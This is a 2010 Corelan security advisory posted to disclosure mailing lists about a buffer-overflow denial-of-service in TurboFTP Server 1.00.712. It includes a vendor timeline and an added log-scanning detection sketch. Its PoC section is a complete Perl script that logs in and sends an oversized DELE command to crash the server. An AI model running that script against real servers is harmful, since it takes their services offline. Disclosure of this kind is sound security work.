Message-ID: <C0641B79F7D6A44791BA8FA35BC143F90153A1A66DB9@apollo.corelan.be>
Date: Tue, 12 Jan 2010 20:25:54 +0100
From: Security <security@...elan.be>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	"secalert@...urityreason.com" <secalert@...urityreason.com>,
	"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"vuln@...unia.com" <vuln@...unia.com>
Cc: Corelan Team <Corelan.Team@...elan.be>
Subject: [CORELAN-10-004]  TurboFTP Server 1.00.712 remote DoS

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@...elan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/


0x00 : Vulnerability information
--------------------------------

[*] Product : Turbo FTP Server
[*] Version : 1.00.712 
[*] Vendor : turbosoft inc
[*] URL : http://www.tbsoftinc.com
[*] Platform : Windows
[*] Type of vulnerability : Buffer overflow - DoS
[*] Risk rating : Medium
[*] Issue fixed in version : 1.00.720
[*] Vulnerability discovered by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
[*] Greetings to : EdiStrosar, rick2600, mr_me, ekse & MarkoT from Corelan Team


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

TurboFTP Server is a high performance, secure, scalable and management 
friendly file transfer server running on Windows platforms. With it you 
can easily set up a secure file transfer server that delivers regular FTP, 
FTP over SSL/TLS, and SFTP over SSH services with virtual domains, 
advanced directory access control, virtual folders, IP access control, 
flexible authentication options and many other features. 



0x02 : Vulnerability details
----------------------------
The "Turbo FTP Server" ftp service is vulnerable to a buffer overflow, 
allowing a malicious person to trigger a Denial Of Service condition
against this service.

In order to trigger the vulnerability, the remote client needs to be able
to log in and issue a specially crafted DELE command.

Note that other commands may be vulnerable too.
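
Added example (not part of the original advisory, and not Corelan or vendor
code): a detection sketch that scans FTP control-channel log lines for command
arguments of unusual length, for DELE and for any other verb. The log format
"<client-ip> <command line>", the 260-byte threshold (Windows MAX_PATH) and the
sample lines are assumptions constructed for illustration.

```python
import re

# Assumption: alert threshold set to Windows MAX_PATH. The advisory does not
# state the length at which the overflow occurs; tune this for your site.
MAX_ARG_LEN = 260

# Assumed log format: "<client-ip> <FTP command line>". FTP verbs are 3-4 letters.
LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<verb>[A-Za-z]{3,4})(?: (?P<arg>.*))?$")


def find_oversized_commands(lines, max_arg_len=MAX_ARG_LEN):
    """Return (ip, verb, arg_len, authenticated) for each over-long argument."""
    authenticated = {}  # client ip -> True once a PASS has been seen
    alerts = []
    for raw in lines:
        m = LINE_RE.match(raw.rstrip("\r\n"))
        if not m:
            continue  # not a command line in the assumed format
        ip, verb, arg = m["ip"], m["verb"].upper(), m["arg"] or ""
        # Check length first so an over-long PASS is reported as pre-auth.
        if len(arg) > max_arg_len:
            alerts.append((ip, verb, len(arg), authenticated.get(ip, False)))
        # Simplifications: state is keyed by client IP and the server's
        # reply code to PASS is not checked.
        if verb == "PASS":
            authenticated[ip] = True
        elif verb in ("QUIT", "REIN"):
            authenticated.pop(ip, None)
    return alerts


# Constructed sample log (documentation addresses, masked passwords).
SAMPLE_LOG = [
    "192.0.2.10 USER alice",
    "192.0.2.10 PASS ********",
    "192.0.2.10 DELE old-report.txt",
    "192.0.2.77 USER bob",
    "192.0.2.77 PASS ********",
    "192.0.2.77 DELE " + "A" * 2000,
    "192.0.2.99 MKD " + "B" * 300,
]

if __name__ == "__main__":
    for ip, verb, length, authed in find_oversized_commands(SAMPLE_LOG):
        state = "authenticated" if authed else "unauthenticated"
        print(f"ALERT {ip} {verb} argument of {length} bytes ({state} session)")
```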




0x03 : Vendor communication
---------------------------
[*] Dec 30, 2009 : Issue found
[*] Jan 1st, 2010 : contacted vendor
[*] Jan 1st, 2010 : vendor opened support ticket
[*] Jan 4th, 2010 : vendor asked for PoC code
[*] Jan 4th, 2010 : PoC code sent
[*] Jan 7th, 2010 : vendor acknowledged issue and started fixing it
[*] Jan 11th, 2010 : vendor released fixed version
[*] Jan 12th, 2010 : Public disclosure

Release notes (on Vendor website):

  V 1.00 Build 720 - Jan 11, 2010

  [-] Buffer overflow problems reported by Corelan Team.
  [-] A file open problem causing WinSCP failed to upload files.
  [-] A problem in log recycling causes server to stall. 



0x04 : Exploit/PoC
------------------
# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date          : 30 December 2009
# Author        : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by  : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version       : 1.00.712
# Issue fixed in: 1.00.720
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                       |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket; 

if ($#ARGV != 3) { 
print "\n  usage: $0 <targetip> <targetport> <user> <password>\n"; 
exit(0); 
} 

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 

$ftp = <$sock> || die " [!] *** Unable to connect ***\n"; 
print "   ** $ftp";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print $sock "PASS $pass\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Sending payload\n";
print $sock "DELE ".$payload."\r\n";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print "   ** $ftp2\n";




